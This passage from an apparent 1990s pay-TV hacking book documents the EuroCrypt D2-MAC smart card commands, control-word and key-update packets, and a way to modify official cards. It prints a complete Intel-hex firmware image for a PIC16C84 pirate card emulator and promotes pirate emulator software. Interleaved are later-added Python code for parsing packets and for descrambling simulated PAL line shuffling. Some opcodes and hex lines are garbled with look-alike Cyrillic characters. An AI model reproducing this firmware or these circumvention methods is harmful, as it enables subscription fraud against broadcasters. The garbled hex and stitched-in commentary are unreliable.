standard were paid by the number of routines and facilities that they could 
incorporate into the design. It seems that they wanted it to do everything from 
Impulse PPV to subscriber surveys. It is not an optimised system and it 
seems that the only thing it cannot do is make the coffee. Of course there 
probably is a routine in there somewhere for ordering it. 


• Instruction: 87 02 
Direction: Decoder to Card 
Length: 3 Bytes 
Purpose: Retrieve General Purpose FAC 
F, NP1, NP2 


• Instruction: 87 04 
Direction: Card to Decoder 
Length: 7 Bytes 
Purpose: Request result after selecting FAC 


Most implementations seem to reply with 00 15 00 00 FF FF FF. Others 
reply with 00 15 00 00 28 0F 04. 


• Instruction: 87 06 
Direction: Card to Decoder 
Length: 4 Bytes 
Purpose: Read block in FAC after selecting block. 
Most PIC implementations seem to reply with 10 02 CA 20 FF. The extra FF 
byte is padding. 
• Instruction: CA B8 


Direction: Card to Decoder 
Length: 6 Bytes 
Purpose: Read data 
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ө Instruction: СА А4 


Direction: Decoder to Card 

Length: Variable 

Purpose: Tells the card which channel is selected. 

CA A4 00 00 00 Select Issuer Entity 

CA A4 02 00 00 Select Next Issuer Entity 

CA A4 04 00 03 <DATA> Select Issuer Entity Direct 

The most significant 20 bits indicate the channel and the least significant 
nybble indicates the access mode. The following is a list of IDs that have 
been recorded over the last year or so (courtesy of William Jansen). 


Channel IDs 
00 04 00  TV3 Norway/Denmark/Sweden 
00 04 00  TV6, ZTV Sweden 
00 04 0f  FilmMax (defunct) 
00 04 10  TV1000 and TV1000 Cinema 
00 04 30  Thor CTV Channels 
00 1c 00  France Telecom TV Feed 
00 24 10  CineCinephile 4:3 (+others) 
00 24 20  CineCinema 
00 28 00  FilmNet 1 and FilmNet 2 
00 28 10  BBC Prime 
00 2b 10  FilmNet 1 and 2 (s) 
00 2b 20  CTV (s) 
00 2b b0  CTV (s) 
00 2b c0  CTV (s) 
00 2c 00  TV Plus Holland 
00 2c 10  TV Plus Select 
00 2d 10  Rendezvous 
00 2d 90  Rendezvous 
00 3c 00  MCM 
00 48 00  TDF 19W 
10 00 10  Canal Plus 4:3 
10 00 30  Canal Plus 16:9 
47 51 00  TV2 Norway 
• Instruction: CA 88 


Direction: Decoder to Card 

Purpose: Compute Control Word 

Length: Typically 24h (36 decimal) 

The EuroCrypt specification is not as elegantly optimised as the VideoCrypt 
system. The reason for this is that EuroCrypt has a greater bandwidth 
than VideoCrypt. Therefore the optimisations and reuse of packets seen in 
VideoCrypt are not particularly necessary. The CA 88 packet carries the 
control word data. 


The decryption key is selected by the P2 byte in the packet. The format of 
the header is CA 88 00 0A 24. The example above uses key 0A. Keys 08 to 0F 
are the operational keys and are used for control word generation. The 
keys 00 to 07 are management keys. The 24 is a hexadecimal indication of 
the length of the packet. 


The card has to send 77h before each byte that it receives. This is the 
T=0 procedure byte: 77h is the complement of the INS byte 88h, and a 
complemented INS tells the decoder to send just the next data byte, so the 
packet is clocked in one byte at a time. On many implementations, the 
preamble to the EA 10 <DATA> is dropped. The F0 08 bytes are answered with 
89h and the checksum data is received in a single block. 


This checksum data is dropped by some of the simpler PIC16C84 
implementations. The more advanced ones use this in the packet check- 
summing routine. (see Chapter 6). 


CA 88 Example 1: TV1000 (Astra) 


Control                        E0 01 00 
Date and Theme & Level         E1 04 21 0D 05 04 
Even and Odd Control Words     EA 10 [16 Bytes of data] 
Hash Signature                 F0 08 [8 Bytes of data] 


CA 88 Example 2: FilmNet (Astra) 


Control                        E0 01 00 
Date and Theme & Level         E1 04 21 0C 05 01 
Even and Odd Control Words     EA 10 [16 Bytes of data] 
Hash Signature                 F0 08 [8 Bytes of data] 


The CA 88 packet is broken into segments. This is in some ways similar to 
the VideoCrypt 74h packet. The different segments of each packet are 
delimited by Marker Bytes. 

Marker Bytes: 
E0  Control (Scrambled, Blackout or Clear) 
E1  Broadcast Date and Theme & Level 
E2  Broadcast Date and Programme Class 
E3  Programme Number 
E4  Programme Number and Cost 
E5  Programme Number and Cost Per Time 
E8  Even Control Word 
E9  Odd Control Word 
EA  Even and Odd Control Word 
F0  Hash Signature 
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The EO marker indicates that the packet is a control packet. It has a length 
of one byte and it seems to be indicate the status of the channel. It can 
also be used to signal a blackout or that the transmission is clear 
scrambled (not controlled access). 


The E1 indicates the broadcast date, and the theme and level of the 
programme. It has a length of 04 bytes as indicated by the E1 04 in the 
example. The broadcast date is indicated by the first two bytes. 


The seven most significant bits indicate the year. This is the number of 
years since 1980, which in this case is 16. The next four bits indicate the 
month, which in the example is 8 (August). The last five bits indicates the 
day, which in the example is OD. In decimal this is day 13. So from the 
example, the packet was transmitted on 13/August/1996. 


Broadcast Date 

Hexadecimal: 210D 
                Years     Month   Day 
Binary:         0010000   1000    01101 
Decimal:        16        08      13 

The decimal 16 is equal to the number of years since 1980. The other 
results are equal, in decimal, to the month and the day. 


The Theme and Level bytes are generally used to control access on the 
basis of Theme and Level of access. The card, (the official one), will check 
that it has a subscription valid for the broadcast date and valid for the theme 
and level of access. The first byte is the Theme byte and the second is the 
Level byte. If the Theme byte is FF then the Level byte is ignored. If the 
Theme (entitlement) byte in the card is FF then the card can access all 
levels. This is perhaps a Phoenix type weakness as the official card can be 
modified with the necessary data. The following Theme bytes have been 
recorded. (Courtesy of William Jansen). 


Theme Bytes 
00 All              08 News 
01 Arts             09 Series 
02 Children         0A Sports 
03 Club             0B Special 
04 Entertainment    0C Nature 
05 Film             0D Documentary 
06 Lifestyle        0E Miniseries 
07 Music            0F Science 
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The EA Control Word marker is followed by a byte indicating the length of 
the subsequent data. While it is possible to send the Even and Odd control 
words separately in the packet by using the EA 08 <EVEN> EA 08 <ODD> 
though in the interests of economy, the control words are typically sent 
together as EA 10 <EVEN><ODD>. 


There are two other bytes at the start of the packet DF 00. The function of 
these bytes is not known yet though they may well be some form of control 
bytes. 


• Instruction: CA C0 


Direction: Card to Decoder 
Purpose: Return Results Of Control Word Computation 


This packet returns the results of the control word calculation to the 
decoder. It is headed by the marker byte EA and the length 10 (16 decimal). 


The Key Update Procedure 


This procedure is not strictly necessary in the majority of cases. Though 
FilmNet and TV1000 do aperiodically update their keys, the relevant 
Management Keys for these channels are not in widespread distribution. 
Without the correct Management Key, the procedure is useless. 


However not all channels are using the old EPROM technology cards. The 
Canal Plus cards seem to use the update procedure regularly. Therefore 
some understanding of the key update procedure is necessary. 


The update procedure uses the CA 18 instruction to change the data in the 
card. This is a powerful instruction and its application is not limited to key 
changes. It can be used to change or delete other data in the card. In some 
respects it is like the Nanocommands in the Sky 09 card. 


• Instruction: CA 18 
Direction: Decoder to Card 
Length: Variable 
Purpose: Enter Information 


According to the specification document, this command is used to enter 
information. The information can be the modification of an entity or perhaps 
more importantly from the hacker viewpoint, to modify keys. 
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The packet can be addressed to the entire audience, as indeed the Canal 
Plus updates are, or they cane addressed to shared groups or individual 
subscribers. This is signaled by the P1 byte. 
P1 Byte Meanings 

00 Entire Audience 

01 Shared Group 

02 Single Subscriber 
The P2 byte signals the key index to be updated. This packet also relies on 


marker bytes to divide the packet into segments. The marker bytes are 
followed by a length byte that indicates how many bytes are to follow. 


A0 01  Control 
A8 06  Dates, Themes and Levels 
A1 03  Update Channel and Key Number to be updated 
EF 08  Encrypted New Key 
F0 08  Hash Signature 


The effective key length in DES, and indeed in the EuroCrypt function, is 
seven bytes (56 bits). The EF block nevertheless carries eight bytes: when 
it is decrypted under the management key, the eighth byte of the result 
must come out as 00h, which acts as a check on the update. If it is 
non-zero it indicates that an error has occurred (a wrong management key 
or a corrupted packet) and the new key must not be stored. 


Example Of CA 18 Canal Plus Key Update 
CA 18 00 06 29                   Header (P1 00 = entire audience, P2 06, length 29h) 
A1 03 10 00 26                   Channel & Management Key To Be Used 
A8 06 1F 90 1F 95 FF FF          Dates and Theme & Level 
A1 03 10 00 29                   Channel and Operational Key to be updated 
EF 08 B0 .. 59 .. E6 05 28 38    Encrypted Operational Key (two bytes illegible in the source) 
F0 08 38 40 0B AF 50 8E C0 A9    Hash Signature 

The length byte 29h (41) is three bytes more than the five listed segments 
account for (5 + 8 + 5 + 10 + 10 = 38), which is exactly the size of an 
A0 01 control segment; that segment is presumably present in the packet 
but omitted from the listing. The two date words decode as 16 and 21 
December 1995 using the encoding given for the E1 segment. 
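The following is an added example, not code from the book or from any of the PIC or PC emulators it discusses. It parses the marker-delimited bodies of both the CA 88 packet described earlier (markers, broadcast date, theme and level) and the CA 18 key update above, using one segment walker for both. The marker bytes, length semantics, date encoding and theme table are taken from the text; the control word, hash and encrypted-key bytes in the two sample packets are constructed filler except where the book prints them, the reading of the A8 06 data as a from/to date pair followed by theme and level is my interpretation of the six-byte example, and the A0 01 00 control segment at the start of the CA 18 sample is assumed, since the listed segments fall three bytes short of the header's length byte 29h. All function names are mine.

```python
"""Segment parser for the EuroCrypt-M CA 88 and CA 18 packet bodies above.

Added example, not code from the book or from any emulator it describes.
Marker bytes, length semantics, the date encoding and the theme table come
from the text; control words, hash and key bytes in the samples are
constructed filler except where the book prints them.
"""
from typing import Dict, List, Tuple

MARKERS = {
    0xDF: "DF 00 prefix (purpose undocumented)",
    0xE0: "control", 0xE1: "broadcast date, theme and level",
    0xE2: "broadcast date and programme class", 0xE3: "programme number",
    0xE4: "programme number and cost", 0xE5: "programme number and cost per time",
    0xE8: "even control word", 0xE9: "odd control word",
    0xEA: "even and odd control words", 0xF0: "hash signature",
    0xA0: "update control", 0xA1: "channel and key number",
    0xA8: "dates, themes and levels", 0xEF: "encrypted new key",
}
THEMES = ["All", "Arts", "Children", "Club", "Entertainment", "Film",
          "Lifestyle", "Music", "News", "Series", "Sports", "Special",
          "Nature", "Documentary", "Miniseries", "Science"]


def parse_segments(body: bytes) -> List[Tuple[int, bytes]]:
    """Split a body into (marker, data) pairs: marker, length, data bytes.
    A length byte that runs past the end of the body is rejected."""
    segs, i = [], 0
    while i < len(body):
        if i + 2 > len(body):
            raise ValueError("dangling marker %02X at offset %d" % (body[i], i))
        marker, length = body[i], body[i + 1]
        data = body[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError("segment %02X claims %d bytes, %d present"
                             % (marker, length, len(data)))
        segs.append((marker, data))
        i += 2 + length
    return segs


def decode_date(word: int) -> Tuple[int, int, int]:
    """7 bits of years since 1980, 4 bits of month, 5 bits of day."""
    return 1980 + (word >> 9), (word >> 5) & 0x0F, word & 0x1F


def theme_level(theme: int, level: int) -> str:
    """A theme byte of FF means the level byte is ignored."""
    if theme == 0xFF:
        return "any theme (level ignored)"
    name = THEMES[theme] if theme < len(THEMES) else "theme %02X" % theme
    return "%s, level %d" % (name, level)


def channel_and_key(data: bytes) -> Tuple[int, int]:
    """A1 03 data: 20-bit channel ID followed by a 4-bit key index."""
    value = int.from_bytes(data, "big")
    return value >> 4, value & 0x0F


def describe(body: bytes) -> Dict[str, object]:
    """Walk the segments and collect the fields a card would act on."""
    out: Dict[str, object] = {"segments": [], "keys": []}
    for marker, data in parse_segments(body):
        out["segments"].append(MARKERS.get(marker, "unknown %02X" % marker))
        if marker == 0xE1 and len(data) == 4:
            out["date"] = decode_date(int.from_bytes(data[:2], "big"))
            out["access"] = theme_level(data[2], data[3])
        elif marker == 0xA8 and len(data) == 6:
            # Read as a from/to date pair then theme and level; this layout
            # is an interpretation of the six-byte example, not spec text.
            out["valid_from"] = decode_date(int.from_bytes(data[:2], "big"))
            out["valid_to"] = decode_date(int.from_bytes(data[2:4], "big"))
            out["access"] = theme_level(data[4], data[5])
        elif marker == 0xEA and len(data) == 16:
            out["even_cw"], out["odd_cw"] = data[:8], data[8:]
        elif marker == 0xA1 and len(data) == 3:
            out["keys"].append(channel_and_key(data))
        elif marker in (0xEF, 0xF0):
            out["key" if marker == 0xEF else "hash"] = data
    return out


def accept_decrypted_key(plain: bytes) -> bytes:
    """Check applied after the EF block is decrypted under the management
    key: the eighth byte must be 00h, the first seven are the new key."""
    if len(plain) != 8 or plain[7] != 0x00:
        raise ValueError("key update failed check, last byte %02X" % plain[-1])
    return plain[:7]


def length_matches(p3: int, body: bytes) -> bool:
    """The header length byte (P3) must equal the number of body bytes."""
    return p3 == len(body)


# CA 88 example 1 (TV1000) above, header CA 88 00 0A 24; CW and hash are filler.
CA88_TV1000 = bytes.fromhex(
    "DF00" "E00100" "E104210D0504" "EA10" + "11" * 16 + "F008" + "22" * 8)

# CA 18 Canal Plus update above, header CA 18 00 06 29. The A0 01 00 control
# segment is assumed: without it the segments total 38 bytes, not 29h (41).
CA18_CANAL = bytes.fromhex(
    "A00100" "A103100026" "A8061F901F95FFFF" "A103100029"
    + "EF08" + "33" * 8              # encrypted key: filler
    + "F00838400BAF508EC0A9")        # hash signature as printed
```

Two points worth noting. The parser refuses a segment whose length byte overruns the body instead of silently truncating it, which is the check a card emulator should make before it acts on a control word or a key. And length_matches is only asserted for the CA 18 sample: with the DF 00 prefix the CA 88 sample comes to 39 bytes against the 24h (36) in the book's header, a discrepancy the text does not resolve, so that accounting is left as the book has it.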


The current situation with most of the D2-MAC channels is that the hackers 
do not have the management keys. Therefore every time there is a key 
change, they are left without the keys. However the commercial pirates do 
have the Management key. The result of every key update for the 
commercial pirates is more money from the upgrades. 
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e Instruction: CA 24 


Direction: Decoder to Card 

Purpose: Modify lock/unlock indicators 

Length: 9 Bytes 

This is a PIN (Personal Identification Number) controlled operation. It is 
used to change the status on PIN codes, maturity ratings or purchase 
ceiling. The PIN code is eight bytes long and the lock status is represented 
by the lower nybble of the last byte. On some of the battery cards this is 
used to update some of the keys. 


CA 24 00 00 09 Modify lock/unlock indicators 


The first eight bytes are the PIN number and the last byte represents the 
locks. The high nybble of the last byte is always 0h. A locked state is 
represented by 0 and an unlocked state is represented by 1. Bit 0 is the 
Impulse Purchase bit. Bit 1 is the Maturity Rating bit. Bit 2 is the 
Consultation bit. Bit 3 is the Programme Preselection bit. 


CA 24 01 00 10 Modify PIN Code 


This changes the PIN code. The first eight bytes represent the existing PIN 
code and the following eight bytes represent the new PIN code. 


CA 24 02 00 09 Modify Maturity Rating 


The first eight bytes represent the PIN and the last byte represents the 
Maturity Rating. The high nybble of the last byte is 0h. This may be some 
form of parental lockout. 

CA 24 03 00 0C Modify Purchase Ceiling 


The first eight bytes are the PIN code and the next four bytes represent the 
purchase ceiling. The Most Significant Byte of the purchase ceiling is always 
00h. 

The significance of this instruction is that it is used to update the keys in the 
MultiMac program by Micheal Stegen. This means that a user can update 
his PIC16C84 card using the remote control handset rather than having to 
have the card inserted into a reprogrammer. 


• Instruction: CA 26 
Direction: Card to Decoder 
Purpose: ? 


The function of this packet is not known at this time. It may have something 
to do with the crypto algorithm in use. On EuroCrypt-M, this algorithm is 
signalled by 20h. 
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PIC Source Code And Emulator Programs 


There are many versions of the PIC16C84 D2-MAC EuroCrypt code 
available. If you log on to any specialised BBS or indeed any of the WWW 
sites listed earlier in the book, the chances are you are going to be spoiled 
for choice. 


Many of the programs available use common elements such as the serial 
interface routines and the crypto algorithm. The quality of the implementa- 
tions can vary but there are some excellent implementations. 


People take existing source code and work on it. Generally they improve it 
and, true to the Hacker Ethic they will release it into the public domain. Of 
course there are some, notably the commercial pirates, who would disagree 
with this. Their motives are purely financial. They after all do pay for the new 
codes and seeing them released on the internet and the BBSes shortly after 
a code change is upsetting. The result of this is that the newer cards used 
by the commercial pirates are more difficult to pop. The Rendezvous cards 
are a good example. The pirate cards do not use the PIC16C84 and thus 
the code is not widely available as is the code for TV1000 or FilmNet. 


The best and most supported emulator program for the PC at the moment is 
the Voyager by William Jansen and Toysoft This is a public domain 
program and it is also the best documented. The authors have included test 
details from most D2-MAC decoders and IRDs on the market in a 
mini-FAQ. 


Perhaps one of the most innovative and useful developments in the recent 
few months has been the MultiMac program from Michael Stegen. This is a 
program that runs under DOS that will allow the user to configure the code 
for a PIC16C84 single chip D2-MAC EuroCrypt card. 


The options on MultiMac allow the file format, the programming format and 
the output pin to be selected by the user. This has effectively given a new 
lifespan to the old Sky 09 pirate cards. They can now be reconfigured for 
D2-MAC EuroCrypt. An additional aspect of the MultiMac program is that 
the code on the PIC16C84 can be subsequently updated via the remote 
control handset of the D2-MAC decoder. This means that it is also 
extremely useful for dealers who can use the program for their own cards. 


The program can also provide code capable of being used on all of the 
more popular PIC16C84 programmers. The main programmers are the 
Henk Schaer programmer and the David Tait programmer. The Tait 
Programmer requires the program area and the EEPROM areas to be split. 
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PIC16C84 D2-MAC EuroCrypt Emulator 


Data = PIN 13 (RB7) 
:0800000021AA300900A0302929B03090216A080AC5 
:080008003908216A30F0058A301B00840A84218D6A 
:0800100000801E84280E300COOAF082F3E432028A5 
:08001800061D1903281E0BAF28152805082F3C07BD 
:080020001C032826081D08A01D03216A082F3E4F2F 
:080028000082343F3467342F3400341134143400E8 
:08003000340334683410340234CA34203400348F32 
:080038003400341534003404341434083434342097 
:080040003430340C340134183402340434B834A461 
:0800480034C03406342434AC3488341834F03426C4 
:08005000286529AF286E2891293E285F28762861DF 
:0800580029242908285D306E2806306B28063032A6 
:0800600029B030AC216A081E00AE03A01BA02805F9 
:08006800218D3A401C9E1903158A2865082E2165AA 
:080070000320216A03A01D03287128A4218D00887C 
:080078001D03287D0BA028762805301102881B8BD4 
:080080001C03287A218D00891A0915881A8917887E 
:0800880039070089151F20A607891820218D219F77 
:08009000028A4189E28A2191E2899081E1903018C55 
:08009800280521802180390F0080218039F0068098 
:0800A000038C28050A8C1A0C158A280501AE30092C 
:0800A80000AF082F3E3A20280601190328B4300774 
:0800B00007AE0BAF28A934F10BAF28B81D1F34EAEF 
:0800B800082E000820A600893021008420C91F894D 
:0800C00028C308092028008004890484108428BECC 
:0800C8000008168314081283080800083439347481 
:0800D000340734C1343F3418340034123437345AE6 
:0800D800344334E434A1344834BF346D34FE3499AD 
:0800E0003469346334403489346134303438343F08 
:0800E800347B34A83473341334C6348A343534FD45 
:0800F00034E7341934B2344034B3346E34B334D7CB 
:0800F80030140084300700AC20C90600190329031E 
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:0801000008000088219F0A840A890BAC28FC0008A3 
:080108001504089E10032805080139CF100328057F 
:0801100030152186218C009030CE1A103E0E189F93 
:080118003E0720BB218B21F31E103E0700891A0ADF 
:080120000A901C1020F82933178B080D0081120A49 
:08012800181F160A20BA301A218621F330080089D8 
:08013000301421BA21F3218B3089190A3019216A38 
:08013800300800AC218D0BAC293A28051E20294E31 
:0801400030EA216530102165300C00840800216AFE 
:080148000A840BA029460801008D2805080C3E3AB8 
:08015000202800AD390F300019033010182D304722 
:0801580021650820390F19403E201820305121652C 
:08016000082D380F2165303529B003A0296A30777A 
:08016800190A30E700AA09AA303221AB307F0066B5 
:0801700001AB1386300800A821AA082A06AB13861B 
:080178001BAA17860DAA0BA8297421AA13861FABE8 
:08018000178621AA30FF0066304F29AB02A0218CD8 
:080188000BA029870008218C21671B86298D302A26 
:0801900021AB300900A810031B8614030DAA21AA6D 
:080198000BA829930CAA302821AB092A0008168342 
:0801A00015083055008930AA00891488188829A6BE 
:0801A80012830008301B00A90BA929AC3400303899 
:0801B00000AD03A01BA02805082D20281F2D0AAD8F 
:0801B800216A29B121BC29BD008421C021C021C0F0 
:0801C00008000088080902840808008008090784E4 
:0801C8000A8400081003180129DA19A4140311A4E1 
:0801D0000DA70DA60DA50DA40DA30DA20DA1180335 
:0801D800162400081A24140312240CA10CA20CA348 
:0801E0000CA40CA50CA60CA7180315A400080088ED 
:0801E8000C880C0806000A84393F0409202800887E 
:0801F00030400789000830180084218C00800A8478 
:0801F8001E8429F51C012A0730180095178322BD9B 
:080200000A951E9529FF30100089302821BA301040 
:0802080000A018011E202A0D2A1721CA0320190355 
:080210002A173C0D1C032A173A061D0321CA148A13 
:08021800100A3028009430CD0097300600960A97D7 
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:0802200008172028009539073Е200084009530Ғ0Ғ6 
:08022800059518030E950815100305001D0314030A 
:08023000081400840D800B962A1F130013800A946B 
:0802380019942A1D019401950197140A0189302807 
:0802400000840C1F0C1C21E71988179519081796BC 
:0802480018881496180814970D1D0D1C21EA19889A 
:0802500015951908161718881714180817160С1С6Е 
:080258000С1021Е71988141619081415188815178С 
:08026000180815140D1E0D1D21EA198817171908FD 
:08026800161618881715180817940C1D0C1E21E770 
:080270001B8814141B0815151A8817971A08169452 
:080278000D1F0D1E21EA1B8816141B0815971A88DE 
:0802800016951A0816960C1E0C1F21E71B881417D2 
:080288001B0816151A8815161A0814940D1C0D1F34 
:0802900021EA1B8815941B0816971A8814951A08D2 
:0802980015960818069408190695081A0696081B5C 
:0802A000069730040089301C21BC30F800893014DE 
:0802A800218C0BA02A091C01341521CA301F00955E 
:0802B000138322BD300406951D152AB1039519152F 
:0802B8002AB130140089302829BA30280096081550 
:0802C00000841F832AC60D800D802AC70C8008166B 
:0802C80000840C800A961E162ABF000834A234430C 
:0802D0003412348B344134C13411340C349234A197 
:0802D80034C3342234933413340A34093424348933 
:0802E000348A34913414340B34C234213446340F04 
:0802E800349434C53496349734A43480341734C60A 
:0802F0003445348E340E34473495348F342534C72E 
:0802F80034A634263427340D34C4348C0000000076 
:08030000342E34E034C434BF344D3427341134C47B 
:080308003472344E34AF347234BB34DD346834115B 
:080310003483345A345A3406343634FC34FC34AB2F 
:0803180034D534393409349534E03483349734682F 
:08032000344434BF3421348C341E34C834B8347275 
:0803280034AD341434D634E934723421348B34D7B8 
:0803300034FF3465349C34FB34C934033457349E69 
:08033800346334AA343A34403405345634E0343D1E 
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:0803400034CF34A3341134FD34A8344434FE342784 
:080348003496347F342B34C2346334983484345E2E 
:080350003409346C34D73410343234D1344D34EA6F 
:0803580034EC3406347034B93455343B34BA348513 
:080360003490344D34EE343834F7342A345B34C1B5 
:08036800342A34933484345F34CD34F4343134A2B9 
:08037000347534BB340834E6344C341734A6347C42 
:080378003419346034D3340534B2348E346F34D904 
:08038000344A34DD34B03407342934B034EE3479B7 
:0803880034F6344334033494348F341634D534AAD9 
:08039000343134E234CD3438349C3455347734CE77 
:08039800345B342C34A434FB3462348F341834612D 
:0803A000341D3461344634BA34B434DD34D934804D 
:0803A80034C83416343F3449347334A834E03477D5 
:0803B00034AB349434F1345F3462340E348C34F327 
:0803B800340534EB345A3425349E3432342734CC6B 
:0803C00034D7341D342D34F8348E34DB344334854B 
:0803C800346034A634F6343F34B93470341A3443CC 
:0803D00034A134C4349234573438346234E534BCFC 
:0803D800345B3401340C34EA34C4349E347F342921 
:0803E000347A342334B6341F344934E03410347654 
:0803E800349C344A34CB34A134E7348D342D34D8A2 
:0803F000340F34F9346134C434A3349534DE340B17 
:0803F80034F5343C3432345734583462348434BEA7 
:01200700000107 
:08210000009900010000005C006300F800500070C6 
:0821080000BF006E0051009F00B800A6001200063C 
:082110000028003A004B001D00E20087008500BA55 
:0821180000D500C8001100B400C2001500B7002DA2 
:08212000007C0093007900840066003000E4000A57 
:0821280000FA0023005E00EC00E300580054006E38 
:08213000008800110045006300400078004000EB16 
:0821380000450008009500FF00ED0045002100105B 
:00000001FF 
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Postscript 


At this current point in time, most of the systems in operation in Europe have been 
hacked. The only ones to remain largely intact have been those that are not used on 
major networks. However this does not protect them. Hackers are examining these 
decoders as well. 


The DirecTv system, VideoGuard has been compromised in North America. This 
system was the first truly digital television service to be hacked and it does not 
bode well for other services. However it must be said that it was News Datacom 
who were providing the security. 


While having News Datacom is not exactly a kiss of death for a system it is like 
the scent of blood to sharks. The sharks in this case being the hackers and pirates 
who had become familiar with the operation of VideoCrypt in Europe. Of course 
the VideoGuard system was a completely new system at the time. 


It was perhaps expected that this system would be hacked. It was developed 
around the same time as the VideoCrypt-II card and seems to use many of the same 
techniques. However it may also have built on the techniques used in the 09 Sky 
card. The problem here seems to be that the smart card used on all three services, 
VideoCrypt-1, VideoCrypt-II and DSS is one that had been popped successfully. 
Therefore when it came to popping the newest of these, the DSS card, the 
techniques had been perfected. 


The DirecTv system also seems to use the element of card-decoder personalisa- 
tion. This means that one card cannot be used in a multitude of decoders. There is 
a probable hack for this and it would not be unlikely to see a blocker device 
appearing. 


The fact that the DirecTv card appeared slightly before the 09 card may have some 
other significance. The NanoCommands that formed a cornerstone of the 09 card 
may not actually be present in the DirecTv card. If this is the case then the hack on 
this card is more serious than people realise. The true test of this will be seen when 
the Phoenixed cards start to appear on the market in decent numbers. 


According to some sources, the Phoenix Activator program for DSS was to be 
released on to the internet and the BBSes as retaliation for the DirecTv and News 
Datacom instigated raids in Canada. However the program has not yet appeared. 
This may be because the raids in Canada only represented a very small strike 
against piracy on the DirecTv system as a whole. 


Such a tactic of filing suit against foreign domiciled defendants in a US court is of 
questionable value. Sure it makes great headlines but it also fools the service, in 
this case DirecTv, into believing that it is really fighting piracy. It is a News 
Datacom tactic that we in Europe have become all too familiar with in the last few 
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years. The bungling of News Datacom and Sky’s lawyers, especially in Ireland, is 
legendary. But this tactic of making a wonderfully worded press release is at best 
ridiculous and at worst dangerous. 


It can make the lawyers look like fools when it dawns on people that the claims 
made really don’t hold up under scrutiny. Of course in a country where lawyers are 
despised, it can make people feel sorry for the pirates. 


Most of the DirecTv pirates are now operating from jurisdictions outside of the 
US. And it also seems that DirecTv and News Datacom have not filed suit against 
people in other jurisdictions. Interestingly they have filed suit against some one 
hundred people named John Doe. This guy must be a notorious pirate. Actually 
this apparently is a tactic when they do not know the names of the people involved 
in pirating the system. 


It is almost funny to remember that DirecTv executives were quoted in the press as 
saying that if nobody knew about the piracy on their system then it would not be a 
significant problem. And then they go and issue a press release telling people that 
their system is compromised and they are taking legal action against the pirates. 
Legal action? The executives of DirecTv were quoted as saying that their system 
contained wonderful elements that had not even been thought of when the Sky 09 
card was being pirated here in Europe. So where were these wonderful technical 
countermeasures? Perhaps they were a bit too technical for the minds of these 
executives. The only countermeasure to a totally compromised card is a new one. 


At this stage, there are rumours of a new DirecTv smart card issue. The switchover 
to the new card issue is supposed to occur in October. This may well happen even 
though the new cards seem to be thin on the ground at the moment. But DirecTv 
should remember that it is always darkest before the dawn. At this time they should 
be expecting that a SEASON type hack will strike the system. 


The effect of a SEASON type hack on DirecTv would be far greater than an 
equivalent here in Europe. In the US and North America, computer ownership is 
higher. Most of the audience of DirecTv would probably have a PC and internet 
access. But it would be a short lived event especially if the new card appears on 
schedule. The new card will, in all probability be a development of the Sky 10 
card. It will certainly be an interesting Winter for DirecTv and the North American 
pirates and hackers. 


Closer to home, the most stunning news of the last few months is that the Nagra 
Syster SECAM is totally compromised. This hack had been known about for the 
last two years and it is expected that the compromised channels will implement 
some form of ECM. 


However the fact remains that the hacks are now in the public domain. The full 
PCB layouts, circuit diagrams and source code have been posted in various files on 
the WWW sites listed in Chapter 5 and also on BBSes throughout Europe. There is 
a major reluctance of hackers and pirates in France to become directly involved in 
the distribution of pirate decoders. The legal framework in France is rather 
efficient. 


This hack is based on determining the sequence of the shuffle from analysis of the 
RBRB patterns (the alternation of red- and blue-difference chrominance lines) 
characteristic of SECAM. Such a hack would not work on the PAL version. However 
the fact that the PAL colour subcarrier phase advances some 0.579 degrees from one 
line to the next does give a potential starting point for a hack. 
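The ordering leak that the previous paragraph points at, as an added illustration written for this edition (it is not the published Syster hack and not code from the book): a simulated line-shuffle scrambler in which each clear line's colour burst phase advances by the 0.579 degrees quoted above, so measuring the burst phase of a received line gives its original position. The field size, burst length, sample count and the keyed permutation are assumptions made for the simulation; only the per-line phase step comes from the text.

```python
import math
import random

# Simulation parameters. Apart from PHASE_STEP_DEG, which is the figure quoted
# in the text, these are assumptions made for this example.
LINES_PER_FIELD = 288          # active lines permuted as one block (assumed)
PHASE_STEP_DEG = 0.579         # per-line subcarrier phase advance from the text
SAMPLES_PER_BURST = 64         # samples taken across the colour burst (assumed)
CYCLES_PER_BURST = 10          # subcarrier cycles in the sampled burst (assumed)


def burst(phase_deg):
    """Samples of a colour burst cos(w*t + phi) with phase phi in degrees."""
    phi = math.radians(phase_deg)
    w = 2 * math.pi * CYCLES_PER_BURST / SAMPLES_PER_BURST
    return [math.cos(w * k + phi) for k in range(SAMPLES_PER_BURST)]


def measure_phase_deg(samples):
    """Estimate the burst phase by correlating with reference I and Q carriers.

    With an integer number of cycles in the window the two correlations are
    orthogonal, so I = (N/2)cos(phi) and Q = -(N/2)sin(phi).
    Returns the phase in degrees in the range (-180, 180].
    """
    w = 2 * math.pi * CYCLES_PER_BURST / SAMPLES_PER_BURST
    i_acc = sum(s * math.cos(w * k) for k, s in enumerate(samples))
    q_acc = sum(s * math.sin(w * k) for k, s in enumerate(samples))
    return math.degrees(math.atan2(-q_acc, i_acc))


def make_clear_field():
    """Clear field: line n carries a burst whose phase is n * PHASE_STEP_DEG.

    Only the residual per-line advance is modelled; the quarter-cycle PAL
    line-to-line rotation is assumed to have been removed already.
    """
    return [burst(n * PHASE_STEP_DEG) for n in range(LINES_PER_FIELD)]


def shuffle_lines(field, key):
    """Scramble by transmitting the lines in a keyed pseudo-random order.

    random.Random(key) is a stand-in for a real scrambler's key stream.
    Returns (scrambled, perm) with scrambled[pos] == field[perm[pos]].
    """
    perm = list(range(len(field)))
    random.Random(key).shuffle(perm)
    return [field[n] for n in perm], perm


def recover_permutation(scrambled):
    """Read each received line's burst phase and turn it into a line number.

    The step is only 0.579 degrees per line, so a phase error above roughly
    +/-0.29 degrees lands on the wrong line. That tight tolerance is why the
    text calls the phase advance a starting point rather than a hack.
    """
    return [int(round(measure_phase_deg(line) / PHASE_STEP_DEG))
            for line in scrambled]


def descramble(scrambled):
    """Put the lines back in original order using the recovered permutation."""
    out = [None] * len(scrambled)
    for pos, n in enumerate(recover_permutation(scrambled)):
        out[n] = scrambled[pos]
    return out


if __name__ == "__main__":
    clear = make_clear_field()
    scrambled, perm = shuffle_lines(clear, key=0x1996)
    print("permutation recovered:", recover_permutation(scrambled) == perm)
    print("field restored:", descramble(scrambled) == clear)
```

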